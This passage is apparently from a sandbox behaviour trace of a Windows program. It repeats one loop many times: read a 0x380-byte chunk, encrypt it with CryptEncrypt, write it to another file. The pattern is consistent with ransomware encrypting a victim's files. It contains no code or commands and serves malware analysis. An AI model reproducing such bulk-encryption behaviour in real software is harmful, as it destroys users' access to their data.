lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.988] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.988] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.988] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.988] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.988] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.989] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.989] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.989] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.989] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.989] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.989] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.990] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.990] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.990] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.990] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.990] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.990] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.991] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.991] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.991] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.991] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.991] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.991] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.992] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.992] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.992] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.992] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.992] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.993] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.993] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.993] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.993] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.993] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.993] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.994] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.994] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.994] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.994] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.994] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.994] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.995] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, 